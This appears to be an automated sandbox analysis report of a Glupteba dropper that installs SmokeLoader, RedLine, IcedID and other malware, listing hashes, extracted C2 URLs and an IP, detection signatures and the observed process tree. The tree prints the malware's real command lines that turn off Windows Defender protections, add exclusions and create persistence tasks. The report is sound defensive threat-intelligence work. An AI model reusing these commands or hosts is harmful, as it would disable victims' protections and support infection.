glupteba | 56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11

Target

setup_x86_x64_install.exe
Size

4.0MB
MD5

73491325fde5366b31c09da701d07dd6
SHA1

a4e1ada57e590c2df30fc26fad5f3ca57ad922b1
SHA256

56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11
SHA512

28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88

Score

10^/10

glupteba icedid metasploit redline smokeloader socelars janesam 3162718704 aspackv2 backdoor banker discovery dropper infostealer loader stealer suricata trojan

Malware Config

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

janesam

65.108.20.195:6774

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

icedid

Campaign

3162718704

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 2 IoCs

resource	yara_rule
behavioral1/memory/2892-367-0x0000000002E70000-0x000000000378E000-memory.dmp	family_glupteba
behavioral1/memory/2892-368-0x0000000000400000-0x0000000000D39000-memory.dmp	family_glupteba

IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
trojan banker icedid
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	676	2736	rundll32.exe	123
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1112	2736	rundll32.exe	123

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

resource	yara_rule
behavioral1/memory/1260-228-0x0000000000660000-0x000000000067D000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 3 IoCs

resource	yara_rule
behavioral1/files/0x000500000001320d-97.dat	family_socelars
behavioral1/files/0x000500000001320d-162.dat	family_socelars
behavioral1/files/0x000500000001320d-147.dat	family_socelars

suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x0005000000013064-70.dat	aspack_v212_v242
behavioral1/files/0x0005000000013064-71.dat	aspack_v212_v242
behavioral1/files/0x0006000000012675-72.dat	aspack_v212_v242
behavioral1/files/0x0006000000012675-73.dat	aspack_v212_v242
behavioral1/files/0x000500000001307f-76.dat	aspack_v212_v242
behavioral1/files/0x000500000001307f-77.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 14 IoCs

pid	Process
1716	setup_installer.exe
1776	setup_install.exe
2036	Sun19e4ade31b2a.exe
1468	Sun1917b8fb5f09db8.exe
1172	Sun191101c1aaa.exe
1764	Sun1908b94df837b3158.exe
1260	Sun195a1614ec24e6a.exe
984	Sun19262b9e49ad.exe
704	Sun19de8ff4b6aefeb8.exe
1432	Sun1905815e51282417.exe
1036	Sun193fda712d9f1.exe
2108	Sun1966fb31dd5a07.exe
2136	Sun198361825f4.exe
2320	Sun1966fb31dd5a07.tmp

Loads dropped DLL 41 IoCs

pid	Process
1516	setup_x86_x64_install.exe
1716	setup_installer.exe
1716	setup_installer.exe
1716	setup_installer.exe
1716	setup_installer.exe
1716	setup_installer.exe
1716	setup_installer.exe
1776	setup_install.exe
1776	setup_install.exe
1776	setup_install.exe
1776	setup_install.exe
1776	setup_install.exe
1776	setup_install.exe
1776	setup_install.exe
1776	setup_install.exe
1616	cmd.exe
856	cmd.exe
1708	cmd.exe
1708	cmd.exe
1924	cmd.exe
1316	cmd.exe
1468	Sun1917b8fb5f09db8.exe
1468	Sun1917b8fb5f09db8.exe
2040	cmd.exe
1764	Sun1908b94df837b3158.exe
1764	Sun1908b94df837b3158.exe
1096	cmd.exe
1096	cmd.exe
1636	cmd.exe
1488	cmd.exe
432	cmd.exe
1884	cmd.exe
1260	Sun195a1614ec24e6a.exe
1260	Sun195a1614ec24e6a.exe
2108	Sun1966fb31dd5a07.exe
984	Sun19262b9e49ad.exe
2108	Sun1966fb31dd5a07.exe
984	Sun19262b9e49ad.exe
704	Sun19de8ff4b6aefeb8.exe
704	Sun19de8ff4b6aefeb8.exe
2108	Sun1966fb31dd5a07.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3264	icacls.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 10 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
174	ip-api.com
271	ipinfo.io
272	ipinfo.io
205	api.2ip.ua
206	api.2ip.ua
304	ipinfo.io
305	ipinfo.io
12	ip-api.com
33	ipinfo.io
34	ipinfo.io

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 8 IoCs

pid	pid_target	Process	procid_target
2408	3040	WerFault.exe	67
1108	2028	WerFault.exe	71
3744	2344	WerFault.exe	119
3984	3440	WerFault.exe	134
3012	1356	WerFault.exe
2132	2136	WerFault.exe	46
4124	2728	WerFault.exe	122
4856	2544	WerFault.exe	88

Creates scheduled task(s) 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3540	schtasks.exe
3108	schtasks.exe
4492	schtasks.exe
2148	schtasks.exe
2436	schtasks.exe
4576	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
3276	timeout.exe
3416	timeout.exe

Kills process with taskkill 6 IoCs

evasion

pid	Process
4744	taskkill.exe
2228	taskkill.exe
4304	taskkill.exe
3656	taskkill.exe
4932	taskkill.exe
4548	taskkill.exe

Suspicious use of AdjustPrivilegeToken 34 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	984	Sun19262b9e49ad.exe
Token: SeAssignPrimaryTokenPrivilege	984	Sun19262b9e49ad.exe
Token: SeLockMemoryPrivilege	984	Sun19262b9e49ad.exe
Token: SeIncreaseQuotaPrivilege	984	Sun19262b9e49ad.exe
Token: SeMachineAccountPrivilege	984	Sun19262b9e49ad.exe
Token: SeTcbPrivilege	984	Sun19262b9e49ad.exe
Token: SeSecurityPrivilege	984	Sun19262b9e49ad.exe
Token: SeTakeOwnershipPrivilege	984	Sun19262b9e49ad.exe
Token: SeLoadDriverPrivilege	984	Sun19262b9e49ad.exe
Token: SeSystemProfilePrivilege	984	Sun19262b9e49ad.exe
Token: SeSystemtimePrivilege	984	Sun19262b9e49ad.exe
Token: SeProfSingleProcessPrivilege	984	Sun19262b9e49ad.exe
Token: SeIncBasePriorityPrivilege	984	Sun19262b9e49ad.exe
Token: SeCreatePagefilePrivilege	984	Sun19262b9e49ad.exe
Token: SeCreatePermanentPrivilege	984	Sun19262b9e49ad.exe
Token: SeBackupPrivilege	984	Sun19262b9e49ad.exe
Token: SeRestorePrivilege	984	Sun19262b9e49ad.exe
Token: SeShutdownPrivilege	984	Sun19262b9e49ad.exe
Token: SeDebugPrivilege	984	Sun19262b9e49ad.exe
Token: SeAuditPrivilege	984	Sun19262b9e49ad.exe
Token: SeSystemEnvironmentPrivilege	984	Sun19262b9e49ad.exe
Token: SeChangeNotifyPrivilege	984	Sun19262b9e49ad.exe
Token: SeRemoteShutdownPrivilege	984	Sun19262b9e49ad.exe
Token: SeUndockPrivilege	984	Sun19262b9e49ad.exe
Token: SeSyncAgentPrivilege	984	Sun19262b9e49ad.exe
Token: SeEnableDelegationPrivilege	984	Sun19262b9e49ad.exe
Token: SeManageVolumePrivilege	984	Sun19262b9e49ad.exe
Token: SeImpersonatePrivilege	984	Sun19262b9e49ad.exe
Token: SeCreateGlobalPrivilege	984	Sun19262b9e49ad.exe
Token: 31	984	Sun19262b9e49ad.exe
Token: 32	984	Sun19262b9e49ad.exe
Token: 33	984	Sun19262b9e49ad.exe
Token: 34	984	Sun19262b9e49ad.exe
Token: 35	984	Sun19262b9e49ad.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1516 wrote to memory of 1716	1516	setup_x86_x64_install.exe	29
PID 1516 wrote to memory of 1716	1516	setup_x86_x64_install.exe	29
PID 1516 wrote to memory of 1716	1516	setup_x86_x64_install.exe	29
PID 1516 wrote to memory of 1716	1516	setup_x86_x64_install.exe	29
PID 1516 wrote to memory of 1716	1516	setup_x86_x64_install.exe	29
PID 1516 wrote to memory of 1716	1516	setup_x86_x64_install.exe	29
PID 1516 wrote to memory of 1716	1516	setup_x86_x64_install.exe	29
PID 1716 wrote to memory of 1776	1716	setup_installer.exe	30
PID 1716 wrote to memory of 1776	1716	setup_installer.exe	30
PID 1716 wrote to memory of 1776	1716	setup_installer.exe	30
PID 1716 wrote to memory of 1776	1716	setup_installer.exe	30
PID 1716 wrote to memory of 1776	1716	setup_installer.exe	30
PID 1716 wrote to memory of 1776	1716	setup_installer.exe	30
PID 1716 wrote to memory of 1776	1716	setup_installer.exe	30
PID 1776 wrote to memory of 1604	1776	setup_install.exe	32
PID 1776 wrote to memory of 1604	1776	setup_install.exe	32
PID 1776 wrote to memory of 1604	1776	setup_install.exe	32
PID 1776 wrote to memory of 1604	1776	setup_install.exe	32
PID 1776 wrote to memory of 1604	1776	setup_install.exe	32
PID 1776 wrote to memory of 1604	1776	setup_install.exe	32
PID 1776 wrote to memory of 1604	1776	setup_install.exe	32
PID 1776 wrote to memory of 1616	1776	setup_install.exe	33
PID 1776 wrote to memory of 1616	1776	setup_install.exe	33
PID 1776 wrote to memory of 1616	1776	setup_install.exe	33
PID 1776 wrote to memory of 1616	1776	setup_install.exe	33
PID 1776 wrote to memory of 1616	1776	setup_install.exe	33
PID 1776 wrote to memory of 1616	1776	setup_install.exe	33
PID 1776 wrote to memory of 1616	1776	setup_install.exe	33
PID 1776 wrote to memory of 1316	1776	setup_install.exe	34
PID 1776 wrote to memory of 1316	1776	setup_install.exe	34
PID 1776 wrote to memory of 1316	1776	setup_install.exe	34
PID 1776 wrote to memory of 1316	1776	setup_install.exe	34
PID 1776 wrote to memory of 1316	1776	setup_install.exe	34
PID 1776 wrote to memory of 1316	1776	setup_install.exe	34
PID 1776 wrote to memory of 1316	1776	setup_install.exe	34
PID 1776 wrote to memory of 1488	1776	setup_install.exe	35
PID 1776 wrote to memory of 1488	1776	setup_install.exe	35
PID 1776 wrote to memory of 1488	1776	setup_install.exe	35
PID 1776 wrote to memory of 1488	1776	setup_install.exe	35
PID 1776 wrote to memory of 1488	1776	setup_install.exe	35
PID 1776 wrote to memory of 1488	1776	setup_install.exe	35
PID 1776 wrote to memory of 1488	1776	setup_install.exe	35
PID 1776 wrote to memory of 856	1776	setup_install.exe	36
PID 1776 wrote to memory of 856	1776	setup_install.exe	36
PID 1776 wrote to memory of 856	1776	setup_install.exe	36
PID 1776 wrote to memory of 856	1776	setup_install.exe	36
PID 1776 wrote to memory of 856	1776	setup_install.exe	36
PID 1776 wrote to memory of 856	1776	setup_install.exe	36
PID 1776 wrote to memory of 856	1776	setup_install.exe	36
PID 1776 wrote to memory of 1708	1776	setup_install.exe	37
PID 1776 wrote to memory of 1708	1776	setup_install.exe	37
PID 1776 wrote to memory of 1708	1776	setup_install.exe	37
PID 1776 wrote to memory of 1708	1776	setup_install.exe	37
PID 1776 wrote to memory of 1708	1776	setup_install.exe	37
PID 1776 wrote to memory of 1708	1776	setup_install.exe	37
PID 1776 wrote to memory of 1708	1776	setup_install.exe	37
PID 1776 wrote to memory of 1096	1776	setup_install.exe	38
PID 1776 wrote to memory of 1096	1776	setup_install.exe	38
PID 1776 wrote to memory of 1096	1776	setup_install.exe	38
PID 1776 wrote to memory of 1096	1776	setup_install.exe	38
PID 1776 wrote to memory of 1096	1776	setup_install.exe	38
PID 1776 wrote to memory of 1096	1776	setup_install.exe	38
PID 1776 wrote to memory of 1096	1776	setup_install.exe	38
PID 1776 wrote to memory of 1924	1776	setup_install.exe	39

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1516
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1716
- - C:\Users\Admin\AppData\Local\Temp\7zS4B632923\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS4B632923\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1776
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      PID:1604
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        
        PID:240
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe
      4⤵
      Loads dropped DLL
      PID:1616
    - - C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun1917b8fb5f09db8.exe
        
        Sun1917b8fb5f09db8.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1468
      - C:\Users\Admin\Documents\LA1zOt2gGBQ72WZXUQ9L9eDY.exe
        
        "C:\Users\Admin\Documents\LA1zOt2gGBQ72WZXUQ9L9eDY.exe"
        6⤵
        
        PID:2696
      - C:\Users\Admin\Documents\vnwODiRBHcb1XVI1gIUBDzZE.exe
        
        "C:\Users\Admin\Documents\vnwODiRBHcb1XVI1gIUBDzZE.exe"
        6⤵
        
        PID:2328
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\vnwODiRBHcb1XVI1gIUBDzZE.exe"
        7⤵
        
        PID:1420
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        8⤵
        Delays execution with timeout.exe
        
        PID:3276
      - C:\Users\Admin\Documents\tSW1eTxNxipuvXtziEPUqLFS.exe
        
        "C:\Users\Admin\Documents\tSW1eTxNxipuvXtziEPUqLFS.exe"
        6⤵
        
        PID:1724
      - C:\Users\Admin\Documents\jjo7uCY_fl7moe2RIRaRD24x.exe
        
        "C:\Users\Admin\Documents\jjo7uCY_fl7moe2RIRaRD24x.exe"
        6⤵
        
        PID:2528
      - C:\Users\Admin\Documents\acHqoBRbNPS6vlD3u2WEkKN4.exe
        
        "C:\Users\Admin\Documents\acHqoBRbNPS6vlD3u2WEkKN4.exe"
        6⤵
        
        PID:2480
      - C:\Users\Admin\Documents\qiQDN0GLbs9CeKZB__R_iDez.exe
        
        "C:\Users\Admin\Documents\qiQDN0GLbs9CeKZB__R_iDez.exe"
        6⤵
        
        PID:988
        
        C:\Users\Admin\Documents\qiQDN0GLbs9CeKZB__R_iDez.exe
        
        C:\Users\Admin\Documents\qiQDN0GLbs9CeKZB__R_iDez.exe
        7⤵
        
        PID:3736
      - C:\Users\Admin\Documents\NfGJkFtlNWyAPd5Ze5ZRBvdT.exe
        
        "C:\Users\Admin\Documents\NfGJkFtlNWyAPd5Ze5ZRBvdT.exe"
        6⤵
        
        PID:1632
      - C:\Users\Admin\Documents\MIegBJOT1pehU5BDXW6GvHza.exe
        
        "C:\Users\Admin\Documents\MIegBJOT1pehU5BDXW6GvHza.exe"
        6⤵
        
        PID:1184
        
        C:\Users\Admin\Documents\MIegBJOT1pehU5BDXW6GvHza.exe
        
        "C:\Users\Admin\Documents\MIegBJOT1pehU5BDXW6GvHza.exe"
        7⤵
        
        PID:2348
      - C:\Users\Admin\Documents\eh7yucA6kVf2mFwGelFHzMRn.exe
        
        "C:\Users\Admin\Documents\eh7yucA6kVf2mFwGelFHzMRn.exe"
        6⤵
        
        PID:1648
      - C:\Users\Admin\Documents\azBjQPXORRw7kVQWY2P81DOX.exe
        
        "C:\Users\Admin\Documents\azBjQPXORRw7kVQWY2P81DOX.exe"
        6⤵
        
        PID:2460
        
        C:\Users\Admin\Documents\azBjQPXORRw7kVQWY2P81DOX.exe
        
        C:\Users\Admin\Documents\azBjQPXORRw7kVQWY2P81DOX.exe
        7⤵
        
        PID:3704
        
        C:\Users\Admin\Documents\azBjQPXORRw7kVQWY2P81DOX.exe
        
        C:\Users\Admin\Documents\azBjQPXORRw7kVQWY2P81DOX.exe
        7⤵
        
        PID:4036
      - C:\Users\Admin\Documents\1n1mEB_1YwxDotn7E0X276WC.exe
        
        "C:\Users\Admin\Documents\1n1mEB_1YwxDotn7E0X276WC.exe"
        6⤵
        
        PID:2544
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2544 -s 900
        7⤵
        Program crash
        
        PID:4856
      - C:\Users\Admin\Documents\m29kaX9kV_PKNEcMCy9RFtpu.exe
        
        "C:\Users\Admin\Documents\m29kaX9kV_PKNEcMCy9RFtpu.exe"
        6⤵
        
        PID:2548
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:2148
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:2436
        
        C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe
        
        "C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"
        7⤵
        
        PID:4384
        
        C:\Users\Admin\Documents\WLAWzfaZYqMZdruIP6LbFcSl.exe
        
        "C:\Users\Admin\Documents\WLAWzfaZYqMZdruIP6LbFcSl.exe"
        8⤵
        
        PID:4328
        
        C:\Users\Admin\Documents\krMVkP8daoPpkq7hFe7KhyJI.exe
        
        "C:\Users\Admin\Documents\krMVkP8daoPpkq7hFe7KhyJI.exe" /mixtwo
        8⤵
        
        PID:4896
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "krMVkP8daoPpkq7hFe7KhyJI.exe" /f & erase "C:\Users\Admin\Documents\krMVkP8daoPpkq7hFe7KhyJI.exe" & exit
        9⤵
        
        PID:3300
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "krMVkP8daoPpkq7hFe7KhyJI.exe" /f
        10⤵
        Kills process with taskkill
        
        PID:4932
        
        C:\Users\Admin\Documents\mIqFtsGuAnBubwTAJeknNhBs.exe
        
        "C:\Users\Admin\Documents\mIqFtsGuAnBubwTAJeknNhBs.exe"
        8⤵
        
        PID:4956
        
        C:\Users\Admin\Documents\B3Y3bjhw0qwRYGXUCnJJjBRW.exe
        
        "C:\Users\Admin\Documents\B3Y3bjhw0qwRYGXUCnJJjBRW.exe"
        8⤵
        
        PID:4388
        
        C:\Users\Admin\AppData\Local\Temp\7zS99DE.tmp\Install.exe
        
        .\Install.exe
        9⤵
        
        PID:564
        
        C:\Users\Admin\AppData\Local\Temp\7zSAF42.tmp\Install.exe
        
        .\Install.exe /S /site_id "668658"
        10⤵
        
        PID:2628
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
        11⤵
        
        PID:2148
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
        12⤵
        
        PID:1500
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        13⤵
        
        PID:3380
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        14⤵
        
        PID:4540
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        15⤵
        
        PID:2112
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
        12⤵
        
        PID:1520
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        13⤵
        
        PID:2564
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        14⤵
        
        PID:4896
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        15⤵
        
        PID:1420
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
        12⤵
        
        PID:4008
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        13⤵
        
        PID:4812
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        14⤵
        
        PID:4888
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        15⤵
        
        PID:2740
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
        12⤵
        
        PID:2224
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        13⤵
        
        PID:524
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        14⤵
        
        PID:1744
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        15⤵
        
        PID:3944
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        11⤵
        
        PID:3656
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        12⤵
        
        PID:2244
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        13⤵
        
        PID:4244
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        13⤵
        
        PID:5020
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        11⤵
        
        PID:2476
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        12⤵
        
        PID:1592
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        13⤵
        
        PID:4680
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        13⤵
        
        PID:4048
        
        C:\Windows\SysWOW64\schtasks.exe
        
